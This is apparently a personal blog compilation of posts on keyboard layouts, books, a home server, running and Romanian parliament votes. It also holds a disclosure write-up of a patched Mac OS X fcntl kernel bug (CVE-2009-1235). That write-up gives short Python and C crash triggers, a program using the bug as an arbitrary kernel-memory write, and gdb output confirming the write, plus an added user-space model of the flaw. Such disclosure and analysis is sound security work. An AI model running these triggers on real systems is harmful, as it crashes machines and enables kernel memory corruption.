Razvan ME

The Man and the Stone

Æsop was sent one day by his master Xanthus to see what company were at the public bath. He saw that many who came stumbled, both going in and coming out, over a large Stone that lay at the entrance to the bath, and that only one person had the good sense to remove it. He returned and told his master that there was only one Man at the bath. Xanthus accordingly went, and, finding it full of people, demanded of Æsop why he had told him false. Æsop thereupon replied that only he who had removed the Stone could be considered a man, and that the rest were not worthy the name. — The Book of Fables (John B. Alden, Publisher, New York, 1885)

How I write Romanian on MacOS and Linux

In short, I use a US keyboard and switch to the primary layout from the SR-13392:2004 standard using the Alt key on MacOS and the Windows key on Linux.

Installation instructions:

The longer story is the following. I started writing regularly with diacritics around 2008 after I read a post on Vivi’s blog. Back then (as now, for that matter) I used MacOS almost exclusively for chat. None of the default mappings or those offered by Sorin Paliga satisfied me. What I wanted was to use the primary standard but without having to keep switching between keyboards. Fortunately, on MacOS keyboard layouts can easily be edited using Ukelele.

For a long time I had no great need for diacritics support on Linux as well. Only this summer, after another post by Vivi, did I replicate on Linux the layout I was using on MacOS. Initially I tried to make the Alt key work, but unfortunately it conflicts with too many programs, so I chose the Windows key instead.

The Books

I like Valentine’s Day. I think it’s useful to have a day set aside to celebrate the love for somebody else. In general, I find it useful to spend time and think about the people and the things that make my life nicer and enjoyable. A week ago, while unpacking the last boxes from the relocation, I realized, once again, how much I love the books I have. I truly do. Their shape, their texture, the way they smell, the old yellow pages of some of them, the elegance of the type from others, the memories of the time I spent reading some of them… all these small and big things make them all dear to me. Some are old and need to be handled with great care. Some are safely protected by well-made hardcovers. Some are shiny and untouched. Old friends, good friends, new friends. All are living peacefully, sharing a rack near the window. They don’t fight for my attention. They are waiting patiently for the time I don’t yet have. At some point I will.

The Server

Today I had to assemble one more rack in order to finally unpack the last round of boxes. In the process of placing it I had to turn off puppy, my home server. Unfortunately, the power supply started again to misbehave. As before, I opened it up and blew out the dust. The good news is that, after a few hiccups, it started working again, but the sounds I heard do not predict a very bright future. So I had to spend some time to find and order a new power supply. While doing all this I realized something rather unexpected: that I wanted to be a father; I wanted a kid that is old enough to know how to use a computer and passionate about it to the extent of wanting to learn more about it. And I would have liked to have the chance to give him (or her) a server. A machine that he could do whatever he wants with: use it, learn it, experiment with it, break it, fix it, take care of it. A machine that will, piece by piece, die, perhaps teaching him something useful in doing this. I know that this will probably not make sense some time from now. Everything is moving to the cloud and fewer and fewer people are willing to go through the hassle of managing their own machines. But we are not there yet and, in the same way some people like to fix their own cars, motorcycles, bikes or houses, there will be some that will also enjoy trusting their own servers.

I hope that among the parents that try to give their children the best opportunities to discover their talent for arts and science there will be some that will give them a server to play with.

The Zen Master (fictional portrait)

The Zen Master is by far the most remarkable patron of the late gym hours. As expected, the master is the epitome of grace and equilibrium. The master doesn’t come too late or too early and is neither staying too long nor too short. The right measure is something deeply embedded in almost everything the master does. The taste in clothing is refined and the few pieces of the gym attire are always pleasantly matched in both shape and color.

The content of the training is tough, but not too tough, and very well organized. The beginning starts on the mat (same place each time) and it contains a healthy assortment of stretches followed by an intense set of several types of crunches. This last item is of particular importance because the master is also known as The Super Cruncher (not to be confused with another type of crunchers popular in some circles) due to the perfect technique employed in performing them. Next is a lap of walking followed by running. How many laps? Five (half a mile) is the magic number. The speed is much faster than one mile per minute but distinctively slower than a sprint. The running style is another distinctive feature of the master, who sports an impeccable and elegant stride. Another lap of walking and another half a mile concludes half of the whole program. The very end is typically reserved for a vigorous series of jumps. Only after this the right amount of effort was properly achieved.

In accordance with the rules of perfect harmony the master is never in a rush and the main parts are separated by brief breaks, usually including a walk to the water fountain. Like many other people the master is also using a portable audio player but, unlike many, this is never allowed to perturb the focus on the main activity.

The master is a young blonde girl who never smiles. Her outstanding perseverance is inspiring and it will surely serve her well in the future.

Summary of the Baltimore Running Festival 2009

Today I ran the Half Marathon from the Baltimore Running Festival. My finish time was 2:04:50 which placed me on the overall position 2895 out of 7815 (around the top 37% mark). In the Males 30-34 section I’m probably deeper in the bottom half though. :P The average time per mile was 9:32, which was better than I expected. One reason might be the fact that going downhill more than compensated for the slowdown accumulated on the uphill sections.

I just ate and now I’m heading to bed for some rest, so here are some quick observations.

Good stuff:

  • finishing the race faster than I expected
  • the combination of overcast and some showers made the race very enjoyable (and very Baltimore-style too :P)
  • the random people cheering in various places
  • the downhills! Until now I had no idea that I actually like them. :-)
  • the gummy bears. In a few places gummy bears were offered to the runners. Besides being a funny thing in general, it was even funnier to see them forming a trail on the running route. Cute!
  • the meal (the regular breakfast I have each) I had when I got home tasted better than ever.

Not so nice stuff:

  • the places with the Gatorade drinks smelled like some medicine to me
  • the smell of the portable rest rooms. There is not much that can be done to make things better, I guess. I have to say that I made a stop for one after about 6 miles and after that it was great.
  • the blisters I got on my right foot. It was from a callus but it never gave me such problems before. Ignoring it was not wise though. Lesson learned.
  • the last mile was much harder than I expected
  • the heavy dizziness from the end due to the hard stop. There were so many people at the end that it was impossible not to stop though.
  • I lost about 1kg.

Some random stuff:

  • people stopping at Clifton Park to take a leak in the nature. Considering the smell of the alternatives I cannot blame them.
  • no “Keep Plucking that Chicken!” cheering. I would have loved to hear this one. The explanation of the phrase would have made it perfect for anything after 6 miles. Especially for the last one. :-)

The Romanian Parliament vs the US Congress

Continuing in the direction of the previous post, here are some charts showing voting attendance in the two chambers of the parliament alongside the two chambers of the US Congress.

The difference between how seriously things are taken here and there is obvious. An interesting thing to note is the similar size of the chambers (332/132 here, 443/103 there) as well as the number of voting rounds (477/299 here, 686/270 there). The number of days worked is significantly more different (31/35 here, 96/80 there). So the members of the US Congress have more working days, a significantly larger country, and manage to almost never be absent. After almost 20 years of non-communism it seems we still have a long way to go before we do things properly.

I have not yet compared the data with Vivi’s, so the charts may not be very accurate.

Note: the US Senate has only 100 senators. The number 103 is due to the changes that took place along the way. The same applies to the House of Representatives, where the number is 441.

Inspired by Vivi’s Harta Politicii, here is a chart showing the number of votes cast in the Chamber of Deputies in 2009 up to June 23, 2009. Each deputy has a horizontal line reserved. The large number on the right is the total number of votes cast. The number prefixed with “max” indicates the maximum number of votes that could have been cast, and the percentage shows what share of the available votes were exercised. What is interesting is that PNL could have exercised more votes than PSD+PC if they had gone to vote. Even if this would not have significantly influenced the vote, it would have been a remarkable achievement they could have been proud of. :-)

Note: the votes include all votes cast. Political affiliation is determined by the last vote cast (so the figures on the right are approximate).

The Story of a Simple and Dangerous Kernel Bug

Among other things, the update for Mac OS X 10.5.8 also fixed an interesting kernel bug related to the way the fcntl call is handled. The bug was identified as CVE-2009-1235 and the first exploit seems to be from June 2008. The variant that I discovered is much simpler and is, as far as I know, the one that really convinced Apple to solve the issue. :-) The oldest kernel I was able to test the problem on was Darwin 8.0.1, which corresponds to Mac OS X 10.4 “Tiger”. Tiger was announced on June 28, 2004 but was released to the public on April 29, 2005 and it was advertised as containing more than 200 new features. The bug was closed on August 5, 2009 so the number of days the vulnerability was alive was 1599 days (4 years and 3 months).

Here is a way to trigger a kernel panic using Python:

import termios, fcntl
fcntl.fcntl(0, termios.TIOCGWINSZ)

The first parameter to fcntl.fcntl indicates a file descriptor and any open one (0 to 4 in Python) will work.

The C variant is also very simple (it even fits in a tweet!):

#include <fcntl.h>
#include <sys/ioctl.h>

int main()
{
        fcntl(0, TIOCGWINSZ, 0);
        return 0;
}

As expected, this code will also generate a kernel panic when the first parameter for fcntl is 1 (stdout) or 2 (stderr).

Let’s now take a better look at what really happens. First, here is the correct version of the program:

#include <stdio.h>
#include <sys/ioctl.h>

int main()
{
        unsigned short buff[4];
        ioctl(0, TIOCGWINSZ, &buff);
        printf("%d %d %d %d\n", buff[0], buff[1], buff[2], buff[3]);
        return 0;
}

What the code does is obtain the window size. TIOCGWINSZ and the other terminal-related ioctls are fully explained in tty(4).

The output of the above program is the following:

24 80 484 316

The first two numbers are the height and width of the window in characters and the last two are its size in pixels. The first parameter for ioctl is also a file descriptor and the above output is also obtained for 1 (stdout) and 2 (stderr). The size in pixels depends on the terminal program (in mrxvt 0.4.1 the two numbers are always zero).

Comparing the two programs it’s obvious that the buggy one is erroneously using fcntl instead of ioctl. As incredible as it might sound, I managed to do this by mistake. :P This should (obviously) not generate a kernel panic. The good news is that debugging a Darwin kernel is quite easy because Apple is providing Kernel Debug Kits which contain the debug symbols for all the shipped kernels together with some handy gdb macros. The fact that debugging takes place over Ethernet is another useful thing. The call traces of the good and the buggy programs look like this:

(buggy) unix_syscall --> fcntl_nocancel -------------------> VNOP_IOCTL --> cptyioctl --> ttioctl
(non-buggy) unix_syscall --> ioctl --> fo_ioctl --> vn_ioctl --> VNOP_IOCTL --> cptyioctl --> ttioctl

So both calls end up in the same place but take slightly different paths. The end point in /bsd/kern/tty.c is the following:

963          case TIOCGWINSZ:                /* get window size */
964                  *(struct winsize *)data = tp->t_winsize;
965                  break;

The problem is that data in the buggy case is whatever we give as the third parameter in the fcntl call. Considering that the 8 bytes are controlled by the user, it means he can write that amount of information anywhere in kernel memory! Pretty scary, right? :-) A way to really show this is to overwrite some memory that is not used and then examine the region to see if it contains the right thing. Below is an example that uses iso_font for this. Here are the steps (ten is the name of the target machine and it’s a G4 running 10.4.7):

(gdb) attach ten
Connected.
(gdb) print &iso_font
$1 = (unsigned char (*)[4096]) 0x433268

So iso_font is located at 0x433268.

(gdb) x/4hx iso_font
0x433268 <iso_font>:    0x0000  0x0000  0x0000  0x0000

And as expected, the first 8 bytes are zero.

(gdb) c
Continuing.

Next I ran the buggy code with 0x433268 as the third parameter. The program was this:

#include <fcntl.h>
#include <sys/ioctl.h>

int main()
{
        fcntl(0, TIOCGWINSZ, 0x433268);
        return 0;
}

When I ran this the system didn’t crash. What I did next was to crash it (using 0xdeadbeaf as the third parameter for the fcntl call) in order to be able to take another look at iso_font. Here is what I saw:

Program received signal SIGTRAP, Trace/breakpoint trap.
0x002bdd44 in ttioctl (tp=0x2292a04, cmd=1074295912, data=0xdeadbeaf
    <Address 0xdeadbeaf out of bounds>, flag=0, p=0x21b7b18) at
    /SourceCache/xnu/xnu-1228.12.14/bsd/kern/tty.c:964
warning: Source file is more recent than executable.
964                     *(struct winsize *)data = tp->t_winsize;
(gdb) x/4hx iso_font
0x433268 <iso_font>:    0x0018  0x0050  0x01e4  0x013c
(gdb) print tp->t_winsize
$2 = {
  ws_row = 24,
  ws_col = 80,
  ws_xpixel = 484,
  ws_ypixel = 316
}

So the iso_font was indeed changed in the expected way. :-)
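
The difference between the two call paths traced above can be reproduced in a small user-space model, added here as an example (it is not code from the original post or from xnu). The flat mem array, the model_* functions and the hardening shown are assumptions made for illustration; the command value is the cmd=1074295912 from the gdb trace, whose encoded payload size is the 8 bytes of struct winsize.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model: one flat address space, kernel below USER_BASE, user above. */
#define MEM 256u
#define USER_BASE 128u
#define IOC_OUT 0x40000000u
#define IOCPARM_LEN(c) (((c) >> 16) & 0x1fffu)   /* payload size encoded in the command */
#define CMD_GWINSZ 0x40087468u                   /* cmd=1074295912 in the gdb trace */
static uint8_t mem[MEM];
static const uint16_t t_winsize[4] = { 24, 80, 484, 316 };
uint16_t peek16(uint32_t a) { uint16_t v; memcpy(&v, &mem[a], 2); return v; }
/* Stand-in for ttioctl: assumes data is a trusted kernel pointer. */
static int tty_handler(uint32_t cmd, void *data) {
    if (cmd != CMD_GWINSZ) return ENOTTY;
    memcpy(data, t_winsize, sizeof t_winsize);
    return 0;
}
/* copyout refuses any destination outside the user range. */
static int copyout(const void *k, uint32_t uaddr, uint32_t len) {
    if (uaddr < USER_BASE || uaddr >= MEM || len > MEM - uaddr) return EFAULT;
    memcpy(&mem[uaddr], k, len);
    return 0;
}
/* ioctl path: the handler fills a kernel buffer, which is then copied out. */
int model_ioctl(uint32_t cmd, uint32_t uaddr) {
    uint8_t kbuf[64];
    uint32_t len = IOCPARM_LEN(cmd);
    if (len > sizeof kbuf) return ENOTTY;
    int err = tty_handler(cmd, kbuf);
    return (err == 0 && (cmd & IOC_OUT)) ? copyout(kbuf, uaddr, len) : err;
}
/* Buggy fcntl path: the raw user argument reaches the handler as a pointer. */
int model_fcntl_buggy(uint32_t cmd, uint32_t arg) {
    if (arg > MEM - sizeof t_winsize) return EFAULT;  /* model-only bound */
    return tty_handler(cmd, &mem[arg]);
}
/* One possible hardening (an assumption, not Apple's patch): do not forward. */
int model_fcntl_hardened(uint32_t cmd, uint32_t arg) {
    (void)cmd; (void)arg;
    return EINVAL;
}
int main(void) {
    int safe = model_ioctl(CMD_GWINSZ, 16), bug = model_fcntl_buggy(CMD_GWINSZ, 16);
    printf("ioctl -> %d, fcntl -> %d, kernel word at 16 = %d\n", safe, bug, peek16(16));
    return 0;
}
```

In the model, the ioctl path rejects a kernel-range destination with EFAULT and leaves it untouched, while the buggy fcntl path writes the same 24 80 484 316 values seen in iso_font above.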

To make this disclosure full: I discovered the kernel panic in August 2008. I wrote to Apple but the only reply I got was indicating that they are investigating the problem. In July 2009 I finally spent some time and debugged the problem. After I found that it could be used to write arbitrary data in memory I wrote again to Apple. This time they wrote back asking me if I want to be credited in the Security Update. They kept their promise. :-)

About 3 weeks ago, working on smallworld. Things looked a little different then.

This is the first time I got this in Safari. The strange thing is it was a link from Wikipedia. :P

At 30 a man should know himself like the palm of his hand, know the exact number of his defects and qualities, know how far he can go, foretell his failures - be what he is. And, above all, accept these things. - Albert Camus